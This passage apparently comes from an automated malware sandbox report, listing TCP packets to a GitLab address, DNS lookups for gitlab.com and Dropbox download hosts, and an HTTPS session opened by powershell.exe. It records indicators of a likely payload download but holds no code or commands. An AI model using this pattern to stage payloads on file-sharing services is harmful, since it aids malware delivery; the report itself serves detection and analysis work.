Dec 12, 2024 13:05:29.404258966 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.404280901 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.404299021 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.434755087 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.434784889 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.434880972 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.434904099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.434921026 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.434952974 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.441565990 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.441601038 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.441649914 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.441658974 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.441699982 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.449198008 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.449228048 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.449290037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.449296951 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.449338913 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.456826925 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.456850052 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.456891060 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.456897020 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.456918955 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.456949949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.463603973 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.463627100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.463665009 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.463670969 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.463692904 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.463711977 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.471735954 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.471756935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.471820116 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.471828938 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.471862078 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.471885920 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.584762096 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.584793091 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.584845066 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.584872007 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.584899902 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.584911108 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.596168995 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.596204042 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.596246958 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.596256018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.596306086 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.626773119 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.626806021 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.626864910 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.626876116 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.626916885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.633569956 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.633599043 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.633646965 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.633656025 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.633680105 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.633743048 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.641185999 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.641216993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.641314030 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.641326904 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.641350031 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.641376019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.648792982 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.648829937 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.648871899 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.648883104 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.648971081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.648971081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.655508041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.655543089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.655580044 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.655589104 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.655611992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.655658007 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.663714886 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.663746119 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.663785934 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.663794041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.663824081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.663851023 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.776205063 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.776241064 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.776578903 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.776652098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.776730061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.788458109 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.788491011 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.788640022 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.788718939 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.789407015 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.819037914 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.819063902 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.819186926 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.819216967 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.819263935 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.825551033 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.825571060 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.825634956 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.825643063 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.825684071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.833314896 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.833333015 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.833466053 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.833481073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.833527088 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.841022968 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.841039896 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.841134071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.841149092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.841207981 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.848715067 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.848737955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.848819971 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.848846912 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.848891020 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.855799913 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.855818033 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.855921984 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.855936050 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.855993032 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.968588114 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.968611002 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.968754053 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.968820095 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.968888998 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.980431080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.980448961 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.980545998 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.980562925 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.980632067 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.010773897 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.010792017 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.010941982 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.011010885 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.011063099 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.018196106 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.018213034 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.018332005 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.018347025 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.018390894 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.025573969 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.025588989 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.025676012 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.025691032 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.025746107 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.033373117 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.033390045 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.033467054 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.033479929 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.033560038 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.036624908 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.036722898 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.036735058 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.044945955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.044961929 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.045015097 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.045037031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.045063972 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.093218088 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.169517040 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.169540882 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.169631004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.169656038 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.169862032 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.412213087 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.412240982 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.412442923 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.412467957 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.412539005 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.419054985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.419075966 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.419166088 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.419178963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.419243097 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.426556110 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.426573038 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.426660061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.426676035 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.426866055 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.434401989 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.434418917 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.434500933 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.434514999 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.434571981 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.441490889 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.441505909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.441584110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.441596985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.441680908 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.449186087 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.449202061 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.449281931 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.449295998 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.450066090 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.455910921 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.455929041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.456001997 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.456015110 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.458079100 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.463571072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.463598967 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.463679075 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.463700056 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.466082096 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.470837116 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.470865965 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.470931053 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.470941067 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.470988989 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.478492975 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.478532076 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.478591919 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.478601933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.478632927 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.478651047 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.486180067 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.486206055 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.486249924 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.486262083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.486288071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.486309052 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.493546009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.493570089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.493650913 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.493663073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.493792057 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.500108004 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.500132084 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.500196934 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.500211000 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.502074003 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.507823944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.507844925 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.507905960 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.507915020 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.510056973 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.515455961 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.515475035 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.515532017 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.515537024 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.518078089 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.540797949 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.540817976 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.540955067 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.540962934 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.542059898 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.552984953 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.553003073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.553177118 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.553183079 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.553225040 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.560585022 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.560600996 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.560661077 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.560667038 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.561966896 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.590421915 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.590447903 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.590569019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.590581894 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.594064951 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.598107100 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.598125935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.598212004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.598222017 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.598256111 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.605113029 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.605132103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.605201960 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.605206966 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.606062889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.610881090 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.610898018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.610970020 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.610975981 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.611015081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.617412090 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.617433071 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.617486954 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.617492914 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.617515087 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.617532015 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.732381105 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.732407093 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.732459068 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.732506037 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.732537985 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.732598066 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.744611025 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.744636059 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.744735003 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.744760036 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.744806051 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.747391939 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.747423887 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.747472048 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.747483015 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.747512102 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.747541904 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.804869890 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.804903030 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.804971933 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.804991007 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.805025101 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.805044889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.808125973 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.808142900 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.808413029 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.808428049 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:30.808482885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:30.811034918 CET	443	49726	172.65.251.78	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 13:05:01.791409016 CET	192.168.2.6	1.1.1.1	0xb4f5	Standard query (0)	gitlab.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 13:05:07.776730061 CET	192.168.2.6	1.1.1.1	0x13b2	Standard query (0)	www.dropbox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 13:05:10.492300987 CET	192.168.2.6	1.1.1.1	0xb323	Standard query (0)	uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 13:05:15.246819973 CET	192.168.2.6	1.1.1.1	0xb4dd	Standard query (0)	gitlab.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 13:05:01.935739994 CET	1.1.1.1	192.168.2.6	0xb4f5	No error (0)	gitlab.com		172.65.251.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 13:05:07.918185949 CET	1.1.1.1	192.168.2.6	0x13b2	No error (0)	www.dropbox.com	www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 13:05:07.918185949 CET	1.1.1.1	192.168.2.6	0x13b2	No error (0)	www-env.dropbox-dns.com		162.125.65.18	A (IP address)	IN (0x0001)	false
Dec 12, 2024 13:05:10.865439892 CET	1.1.1.1	192.168.2.6	0xb323	No error (0)	uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 13:05:10.865439892 CET	1.1.1.1	192.168.2.6	0xb323	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false
Dec 12, 2024 13:05:15.384954929 CET	1.1.1.1	192.168.2.6	0xb4dd	No error (0)	gitlab.com		172.65.251.78	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	172.65.251.78	443	6860	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
